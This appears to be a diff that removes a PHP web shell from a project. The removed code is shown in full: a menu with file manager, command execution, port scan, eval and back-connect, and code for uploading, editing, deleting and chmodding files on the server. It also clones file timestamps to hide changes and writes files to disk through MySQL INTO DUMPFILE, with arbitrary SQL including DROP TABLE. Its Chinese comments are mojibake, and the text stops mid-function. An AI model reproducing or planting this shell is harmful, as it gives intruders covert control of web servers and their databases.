-                        <a href="javascript:g('file');">File Manager</a> | 

-                        <a href="javascript:g('mysqladmin');">MYSQL Manager</a> | 

-                        <a href="javascript:g('sqlfile');">MySQL Upload &amp; Download</a> | 

-                        <a href="javascript:g('shell');">Execute Command</a> | 

-                        <a href="javascript:g('phpenv');">PHP Variable</a> | 

-                        <a href="javascript:g('portscan');">Port Scan</a> | 

-                        <a href="javascript:g('secinfo');">Security information</a> | 

-                        <a href="javascript:g('eval');">Eval PHP Code</a>

-                        <?php if (!IS_WIN) {?> | <a href="javascript:g('backconnect');">Back Connect</a><?php }?>

-                </td>

-        </tr>

-</table>

-<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>

-<?php

-$errmsg && m($errmsg);

-

-// »ñÈ¡µ±Ç°Â·¾¶

-if (!$dir) {

-        $dir = $_SERVER["DOCUMENT_ROOT"] ? $_SERVER["DOCUMENT_ROOT"] : '.';

-}

-$nowpath = getPath(SA_ROOT, $dir);

-if (substr($dir, -1) != '/') {

-        $dir = $dir.'/';

-}

-

-if ($action == 'file') {

-

-        // Åж϶ÁдÇé¿ö

-        $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';

-

-        // ´´½¨Ä¿Â¼

-        if ($newdirname) {

-                $mkdirs = $nowpath.$newdirname;

-                if (file_exists($mkdirs)) {

-                        m('Directory has already existed');

-                } else {

-                        m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));

-                        @chmod($mkdirs,0777);

-                }

-        }

-

-        // ÉÏ´«Îļþ

-        elseif ($doupfile) {

-                m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));

-        }

-

-        // ±à¼­Îļþ

-        elseif ($editfilename && $filecontent) {

-                $fp = @fopen($editfilename,'w');

-                m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));

-                @fclose($fp);

-        }

-

-        // ±à¼­ÎļþÊôÐÔ

-        elseif ($pfile && $newperm) {

-                if (!file_exists($pfile)) {

-                        m('The original file does not exist');

-                } else {

-                        $newperm = base_convert($newperm,8,10);

-                        m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));

-                }

-        }

-

-        // ¸ÄÃû

-        elseif ($oldname && $newfilename) {

-                $nname = $nowpath.$newfilename;

-                if (file_exists($nname) || !file_exists($oldname)) {

-                        m($nname.' has already existed or original file does not exist');

-                } else {

-                        m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));

-                }

-        }

-

-        // ¸´ÖÆÎļþ

-        elseif ($sname && $tofile) {

-                if (file_exists($tofile) || !file_exists($sname)) {

-                        m('The goal file has already existed or original file does not exist');

-                } else {

-                        m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));

-                }

-        }

-

-        // ¿Ë¡ʱ¼ä

-        elseif ($curfile && $tarfile) {

-                if (!@file_exists($curfile) || !@file_exists($tarfile)) {

-                        m('The goal file has already existed or original file does not exist');

-                } else {

-                        $time = @filemtime($tarfile);

-                        m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));

-                }

-        }

-

-        // ×Ô¶¨Òåʱ¼ä

-        elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {

-                if (!@file_exists($curfile)) {

-                        m(basename($curfile).' does not exist');

-                } else {

-                        $time = strtotime("$year-$month-$day $hour:$minute:$second");

-                        m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));

-                }

-        }

-

-        // ÅúÁ¿É¾³ýÎļþ

-        elseif($doing == 'delfiles') {

-                if ($dl) {

-                        $dfiles='';

-                        $succ = $fail = 0;

-                        foreach ($dl as $filepath) {

-                                if (is_dir($filepath)) {

-                                        if (@deltree($filepath)) {

-                                                $succ++;

-                                        } else {

-                                                $fail++;

-                                        }

-                                } else {

-                                        if (@unlink($filepath)) {

-                                                $succ++;

-                                        } else {

-                                                $fail++;

-                                        }

-                                }

-                        }

-                        m('Deleted folder/file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);

-                } else {

-                        m('Please select folder/file(s)');

-                }

-        }

-

-        //²Ù×÷Íê±Ï

-        formhead(array('name'=>'createdir'));

-        makehide('newdirname');

-        makehide('dir',$nowpath);

-        formfoot();

-        formhead(array('name'=>'fileperm'));

-        makehide('newperm');

-        makehide('pfile');

-        makehide('dir',$nowpath);

-        formfoot();

-        formhead(array('name'=>'copyfile'));

-        makehide('sname');

-        makehide('tofile');

-        makehide('dir',$nowpath);

-        formfoot();

-        formhead(array('name'=>'rename'));

-        makehide('oldname');

-        makehide('newfilename');

-        makehide('dir',$nowpath);

-        formfoot();

-        formhead(array('name'=>'fileopform', 'target'=>'_blank'));

-        makehide('action');

-        makehide('opfile');

-        makehide('dir');

-        formfoot();

-        formhead(array('name'=>'getsize'));

-        makehide('getdir');

-        makehide('dir');

-        formfoot();

-

-        $free = @disk_free_space($nowpath);

-        !$free && $free = 0;

-        $all = @disk_total_space($nowpath);

-        !$all && $all = 0;

-        $used = $all-$free;

-        p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');

-

-        $cwd_links = '';

-        $path = explode('/', $nowpath);

-        $n=count($path);

-        for($i=0;$i<$n-1;$i++) {

-                $cwd_links .= '<a href="javascript:godir(\'';

-                for($j=0;$j<=$i;$j++) {

-                        $cwd_links .= $path[$j].'/';

-                }

-                $cwd_links .= '\');">'.$path[$i].'/</a>';

-        }

-

-?>

-<script type="text/javascript">

-document.onclick = shownav;

-function shownav(e){

-        var src = e?e.target:event.srcElement;

-        do{

-                if(src.id =="jumpto") {

-                        $('inputnav').style.display = "";

-                        $('pathnav').style.display = "none";

-                        //hidenav();

-                        return;

-                }

-                if(src.id =="inputnav") {

-                        return;

-                }

-                src = src.parentNode;

-        }while(src.parentNode)

-

-        $('inputnav').style.display = "none";

-        $('pathnav').style.display = "";

-}

-</script>

-<div style="background:#eee;margin-bottom:10px;">

-        <table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0">

-                <tr>

-                        <td width="100%"><?php echo $cwd_links.' - '.getChmod($nowpath).' / '.getPerms($nowpath).getUser($nowpath);?> (<?php echo $dir_writeable;?>)</td>

-                        <td nowrap><input class="bt" id="jumpto" name="jumpto" value="Jump to" type="button"></td>

-                </tr>

-        </table>

-        <table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;">

-        <form action="" method="post" id="godir" name="godir">

-                <tr>

-                        <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>

-                        <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:99%;margin:0 8px;"></td>

-                        <td nowrap><input class="bt" value="GO" type="submit"></td>

-                </tr>

-        </form>

-        </table>

-<?php

-        if (IS_WIN && IS_COM) {

-                $obj = new COM('scripting.filesystemobject');

-                if ($obj && is_object($obj) && $obj->Drives) {

-                        echo '<div class="drives">';

-                        $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');

-                        $comma = '';

-                        foreach($obj->Drives as $drive) {

-                                if ($drive->Path) {

-                                        p($comma.'<a href="javascript:godir(\''.$drive->Path.'/\');">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');

-                                        $comma = '<span>|</span>';

-                                }

-                        }

-                        echo '</div>';

-                }

-        }

-?>

-</div>

-<?php

-        $findstr = $_POST['findstr'];

-        $re = $_POST['re'];

-        tbhead();

-        p('<tr class="alt1"><td colspan="7" style="padding:5px;line-height:20px;">');

-        p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$nowpath.'" type="hidden" /><input name="dir" value="'.$nowpath.'" type="hidden" /></div></form>');

-        p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');

-        p(' | <a href="javascript:godir(\'.\');">ScriptPath</a>');

-        p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');

-        p(' | View Writable ( <a href="javascript:godir(\''.$nowpath.'\',\'dir\');">Directory</a>');

-        p(' | <a href="javascript:godir(\''.$nowpath.'\',\'file\');">File</a> )');

-        p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');

-

-        p('<div style="padding:5px 0;"><form action="'.$self.'" method="POST">Find string in files(current folder): <input class="input" name="findstr" value="'.$findstr.'" type="text" /> <input class="bt" value="Find" type="submit" /> Type: <input class="input" name="writabledb" value="'.$writabledb.'" type="text" /><input name="dir" value="'.$dir.'" type="hidden" /> <input name="re" value="1" type="checkbox" '.($re ? 'checked' : '').' /> Regular expressions</form></div></td></tr>');

-

-        p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');

-

-        //²é¿´ËùÓпÉдÎļþºÍĿ¼

-        $dirdata=array();

-        $filedata=array();

-

-        if ($view_writable == 'dir') {

-                $dirdata = GetWDirList($nowpath);

-                $filedata = array();

-        } elseif ($view_writable == 'file') {

-                $dirdata = array();

-                $filedata = GetWFileList($nowpath);

-        } elseif ($findstr) {

-                $dirdata = array();

-                $filedata = GetSFileList($nowpath, $findstr, $re);

-        } else {

-                // Ŀ¼Áбí

-                //scandir()ЧÂʸü¸ß

-                $dirs=@opendir($dir);

-                while ($file=@readdir($dirs)) {

-                        $filepath=$nowpath.$file;

-                        if(@is_dir($filepath)){

-                                $dirdb['filename']=$file;

-                                $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));

-                                $dirdb['dirchmod']=getChmod($filepath);

-                                $dirdb['dirperm']=getPerms($filepath);

-                                $dirdb['fileowner']=getUser($filepath);

-                                $dirdb['dirlink']=$nowpath;

-                                $dirdb['server_link']=$filepath;

-                                $dirdata[]=$dirdb;

-                        } else {                

-                                $filedb['filename']=$file;

-                                $filedb['size']=sizecount(@filesize($filepath));

-                                $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));

-                                $filedb['filechmod']=getChmod($filepath);

-                                $filedb['fileperm']=getPerms($filepath);

-                                $filedb['fileowner']=getUser($filepath);

-                                $filedb['dirlink']=$nowpath;

-                                $filedb['server_link']=$filepath;

-                                $filedata[]=$filedb;

-                        }

-                }// while

-                unset($dirdb);

-                unset($filedb);

-                @closedir($dirs);

-        }

-        @sort($dirdata);

-        @sort($filedata);

-        $dir_i = '0';

-

-        p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');

-        makehide('action','file');

-        makehide('thefile');

-        makehide('doing');

-        makehide('dir',$nowpath);

-

-        foreach($dirdata as $key => $dirdb){

-                if($dirdb['filename']!='..' && $dirdb['filename']!='.') {

-                        if($getdir && $getdir == $dirdb['server_link']) {

-                                $attachsize = dirsize($dirdb['server_link']);

-                                $attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';

-                        } else {

-                                $attachsize = '<a href="javascript:getsize(\''.$dirdb['server_link'].'\',\''.$dir.'\');">Stat</a>';

-                        }

-                        $thisbg = bg();

-                        p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');

-                        p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$dirdb['server_link'].'"></td>');

-                        p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');

-                        p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$dirdb['server_link'].'\',\''.$dirdb['dirlink'].'\');">'.$dirdb['mtime'].'</a></td>');

-                        p('<td nowrap>'.$attachsize.'</td>');

-                        p('<td nowrap>');

-                        p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');

-                        p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');

-                        p('<td nowrap><a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');

-                        p('</tr>');

-                        $dir_i++;

-                } else {

-                        if($dirdb['filename']=='..') {

-                                p('<tr class='.bg().'>');

-                                p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');

-                                p('</tr>');

-                        }

-                }

-        }

-

-        p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');

-        $file_i = '0';

-

-        foreach($filedata as $key => $filedb){

-                if($filedb['filename']!='..' && $filedb['filename']!='.') {

-                        $fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']);

-                        $thisbg = bg();

-                        p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');

-                        p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$filedb['server_link'].'"></td>');

-                        p('<td>'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? '<a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a>' : $filedb['filename']).'</td>');

-                        p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">'.$filedb['mtime'].'</a></td>');

-                        p('<td nowrap>'.$filedb['size'].'</td>');

-                        p('<td nowrap>');

-                        p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');

-                        p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');

-                        p('<td nowrap>');

-                        p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');

-                        p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');

-                        p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');

-                        p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a>');

-                        p('</td></tr>');

-                        $file_i++;

-                }

-        }

-        p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');

-        p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td colspan="4"><a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');

-        p('</form></table>');

-}// end dir

-

-elseif ($action == 'sqlfile') {

-        if($doing=="mysqlupload"){

-                $file = $_FILES['uploadfile'];

-                $filename = $file['tmp_name'];

-                if (file_exists($savepath)) {

-                        m('The goal file has already existed');

-                } else {

-                        if(!$filename) {

-                                m('Please choose a file');

-                        } else {

-                                $fp=@fopen($filename,'r');

-                                $contents=@fread($fp, filesize($filename));

-                                @fclose($fp);

-                                $contents = bin2hex($contents);

-                                if(!$upname) $upname = $file['name'];

-                                $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);

-                                $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");

-                                m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());

-                        }

-                }

-        }

-?>

-<script type="text/javascript">

-function mysqlfile(doing){

-        if(!doing) return;

-        $('doing').value=doing;

-        $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;

-        $('mysqlfile').dbport.value=$('dbinfo').dbport.value;

-        $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;

-        $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;

-        $('mysqlfile').dbname.value=$('dbinfo').dbname.value;

-        $('mysqlfile').charset.value=$('dbinfo').charset.value;

-        $('mysqlfile').submit();

-}

-</script>

-<?php

-        !$dbhost && $dbhost = 'localhost';

-        !$dbuser && $dbuser = 'root';

-        !$dbport && $dbport = '3306';

-        formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));

-        makehide('action','sqlfile');

-        p('<p>');

-        p('DBHost:');

-        makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));

-        p(':');

-        makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));

-        p('DBUser:');

-        makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));

-        p('DBPass:');

-        makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));

-        p('DBName:');

-        makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));

-        p('DBCharset:');

-        makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));

-        p('</p>');

-        formfoot();

-        p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');

-        p('<h2>Upload file</h2>');

-        p('<p><b>This operation the DB user must has FILE privilege</b></p>');

-        p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');

-        p('<h2>Download file</h2>');

-        p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');

-        makehide('dbhost');

-        makehide('dbport');

-        makehide('dbuser');

-        makehide('dbpass');

-        makehide('dbname');

-        makehide('charset');

-        makehide('doing');

-        makehide('action','sqlfile');

-        p('</form>');

-}

-

-elseif ($action == 'mysqladmin') {

-        !$dbhost && $dbhost = 'localhost';

-        !$dbuser && $dbuser = 'root';

-        !$dbport && $dbport = '3306';

-        $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';

-        if(isset($dbhost)){

-                $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";

-        }

-        if(isset($dbuser)) {

-                $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";

-        }

-        if(isset($dbpass)) {

-                $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";

-        }

-        if(isset($dbport)) {

-                $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";

-        }

-        if(isset($dbname)) {

-                $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";

-        }

-        if(isset($charset)) {

-                $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";

-        }

-

-        if ($doing == 'backupmysql' && $saveasfile) {

-                if (!$table) {

-                        m('Please choose the table');

-                } else {

-                        $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);

-                        $fp = @fopen($path,'w');

-                        if ($fp) {

-                                foreach($table as $k => $v) {

-                                        if ($v) {

-                                                sqldumptable($v, $fp);

-                                        }

-                                }

-                                fclose($fp);                            

-                                $fileurl = str_replace(SA_ROOT,'',$path);

-                                m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');

-                                mysql_close();

-                        } else {

-                                m('Backup failed');

-                        }

-                }

-        }

-        if ($insert && $insertsql) {

-                $keystr = $valstr = $tmp = '';

-                foreach($insertsql as $key => $val) {

-                        if ($val) {

-                                $keystr .= $tmp.$key;

-                                $valstr .= $tmp."'".addslashes($val)."'";

-                                $tmp = ',';

-                        }

-                }

-                if ($keystr && $valstr) {

-                        $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);

-                        m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());

-                }

-        }

-        if ($update && $insertsql && $base64) {

-                $valstr = $tmp = '';

-                foreach($insertsql as $key => $val) {

-                        $valstr .= $tmp.$key."='".addslashes($val)."'";

-                        $tmp = ',';

-                }

-                if ($valstr) {

-                        $where = base64_decode($base64);

-                        $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);

-                        m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());

-                }

-        }

-        if ($doing == 'del' && $base64) {

-                $where = base64_decode($base64);

-                $delete_sql = "DELETE FROM $tablename WHERE $where";

-                $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);

-                m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());

-        }

-

-        if ($tablename && $doing == 'drop') {

-                $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);

-                if (q("DROP TABLE $tablename")) {

-                        m('Drop table of success');

-                        $tablename = '';

-                } else {

-                        m(mysql_error());

-                }

-        }

-

-        formhead(array('title'=>'MYSQL Manager'));

-        makehide('action','mysqladmin');

-        p('<p>');

-        p('DBHost:');

-        makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));

-        p(':');

-        makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));

-        p('DBUser:');

-        makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));

-        p('DBPass:');

-        makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));

-        p('DBCharset:');

-        makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));

-        makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));

-        p('</p>');

-        formfoot();

-

-        //²Ù×÷¼Ç¼

-        formhead(array('name'=>'recordlist'));

-        makehide('doing');

-        makehide('action','mysqladmin');

-        makehide('base64');

-        makehide('tablename');

-        p($dbform);

-        formfoot();

-

-        //Ñ¡¶¨Êý¾Ý¿â

-        formhead(array('name'=>'setdbname'));

-        makehide('action','mysqladmin');

-        p($dbform);

-        if (!$dbname) {

-                makehide('dbname');

-        }

-        formfoot();

-

-        //Ñ¡¶¨±í

-        formhead(array('name'=>'settable'));

-        makehide('action','mysqladmin');

-        p($dbform);

-        makehide('tablename');

-        makehide('page',$page);

-        makehide('doing');

-        formfoot();

-

-        $cachetables = array(); 

-        $pagenum = 30;

-        $page = intval($page);

-        if($page) {

-                $start_limit = ($page - 1) * $pagenum;

-        } else {

-                $start_limit = 0;

-                $page = 1;

-        }

-        if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {

-                $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);

-                //»ñÈ¡Êý¾Ý¿âÐÅÏ¢

-                $mysqlver = mysql_get_server_info();

-                p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');

-                $highver = $mysqlver > '4.1' ? 1 : 0;

-

-                //»ñÈ¡Êý¾Ý¿â

-                $query = q("SHOW DATABASES");

-                $dbs = array();

-                $dbs[] = '-- Select a database --';

-                while($db = mysql_fetch_array($query)) {

-                        $dbs[$db['Database']] = $db['Database'];

-                }

-                makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));

-                $tabledb = array();

-                if ($dbname) {

-                        p('<p>');

-                        p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');

-                        if ($tablename) {

-                                p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');

-                        }

-                        p('</p>');

-                        mysql_select_db($dbname);

-

-                        $getnumsql = '';

-                        $runquery = 0;

-                        if ($sql_query) {

-                                $runquery = 1;

-                        }

-                        $allowedit = 0;

-                        if ($tablename && !$sql_query) {

-                                $sql_query = "SELECT * FROM $tablename";

-                                $getnumsql = $sql_query;

-                                $sql_query = $sql_query." LIMIT $start_limit, $pagenum";

-                                $allowedit = 1;

-                        }

-                        p('<form action="'.$self.'" method="POST">');

-                        p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');

-                        makehide('tablename', $tablename);

-                        makehide('action','mysqladmin');

-                        p($dbform);

-                        p('</form>');

-                        if ($tablename || ($runquery && $sql_query)) {

-                                if ($doing == 'structure') {

-                                        $result = q("SHOW FULL COLUMNS FROM $tablename");

-                                        $rowdb = array();

-                                        while($row = mysql_fetch_array($result)) {

-                                                $rowdb[] = $row;

-                                        }

-                                        p('<h3>Structure</h3>');

-                                        p('<table border="0" cellpadding="3" cellspacing="0">');

-                                        p('<tr class="head">');

-                                        p('<td>Field</td>');

-                                        p('<td>Type</td>');

-                                        p('<td>Collation</td>');

-                                        p('<td>Null</td>');

-                                        p('<td>Key</td>');

-                                        p('<td>Default</td>');

-                                        p('<td>Extra</td>');

-                                        p('<td>Privileges</td>');

-                                        p('<td>Comment</td>');

-                                        p('</tr>');

-                                        foreach ($rowdb as $row) {

-                                                $thisbg = bg();

-                                                p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');

-                                                p('<td>'.$row['Field'].'</td>');

-                                                p('<td>'.$row['Type'].'</td>');

-                                                p('<td>'.$row['Collation'].'&nbsp;</td>');

-                                                p('<td>'.$row['Null'].'&nbsp;</td>');

-                                                p('<td>'.$row['Key'].'&nbsp;</td>');

-                                                p('<td>'.$row['Default'].'&nbsp;</td>');

-                                                p('<td>'.$row['Extra'].'&nbsp;</td>');

-                                                p('<td>'.$row['Privileges'].'&nbsp;</td>');

-                                                p('<td>'.$row['Comment'].'&nbsp;</td>');

-                                                p('</tr>');

-                                        }

-                                        tbfoot();

-                                        $result = q("SHOW INDEX FROM $tablename");

-                                        $rowdb = array();

-                                        while($row = mysql_fetch_array($result)) {

-                                                $rowdb[] = $row;

-                                        }

-                                        p('<h3>Indexes</h3>');

-                                        p('<table border="0" cellpadding="3" cellspacing="0">');

-                                        p('<tr class="head">');

-                                        p('<td>Keyname</td>');

-                                        p('<td>Type</td>');

-                                        p('<td>Unique</td>');

-                                        p('<td>Packed</td>');

-                                        p('<td>Seq_in_index</td>');

-                                        p('<td>Field</td>');

-                                        p('<td>Cardinality</td>');

-                                        p('<td>Collation</td>');

-                                        p('<td>Null</td>');

-                                        p('<td>Comment</td>');

-                                        p('</tr>');

-                                        foreach ($rowdb as $row) {

-                                                $thisbg = bg();

-                                                p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');

-                                                p('<td>'.$row['Key_name'].'</td>');

-                                                p('<td>'.$row['Index_type'].'</td>');

-                                                p('<td>'.($row['Non_unique'] ? 'No' : 'Yes').'&nbsp;</td>');

-                                                p('<td>'.($row['Packed'] === null ? 'No' : $row['Packed']).'&nbsp;</td>');

-                                                p('<td>'.$row['Seq_in_index'].'</td>');

-                                                p('<td>'.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').'&nbsp;</td>');

-                                                p('<td>'.($row['Cardinality'] ? $row['Cardinality'] : 0).'&nbsp;</td>');

-                                                p('<td>'.$row['Collation'].'&nbsp;</td>');

-                                                p('<td>'.$row['Null'].'&nbsp;</td>');

-                                                p('<td>'.$row['Comment'].'&nbsp;</td>');

-                                                p('</tr>');

-                                        }

-                                        tbfoot();

-                                } elseif ($doing == 'insert' || $doing == 'edit') {

-                                        $result = q('SHOW COLUMNS FROM '.$tablename);

-                                        while ($row = mysql_fetch_array($result)) {

-                                                $rowdb[] = $row;

-                                        }

-                                        $rs = array();

-                                        if ($doing == 'insert') {

-                                                p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');

-                                        } else {

-                                                p('<h2>Update record in '.$tablename.' table &raquo;</h2>');

-                                                $where = base64_decode($base64);

-                                                $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");

-                                                $rs = mysql_fetch_array($result);

-                                        }

-                                        p('<form method="post" action="'.$self.'">');

-                                        p($dbform);

-                                        makehide('action','mysqladmin');

-                                        makehide('tablename',$tablename);

-                                        p('<table border="0" cellpadding="3" cellspacing="0">');

-                                        foreach ($rowdb as $row) {

-                                                if ($rs[$row['Field']]) {

-                                                        $value = htmlspecialchars($rs[$row['Field']]);

-                                                } else {

-                                                        $value = '';

-                                                }

-                                                $thisbg = bg();

-                                                p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');

-                                                if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') {

-                                                        p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td>'.$value.'&nbsp;</td></tr>');

-                                                } else {                                                        

-                                                        p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');

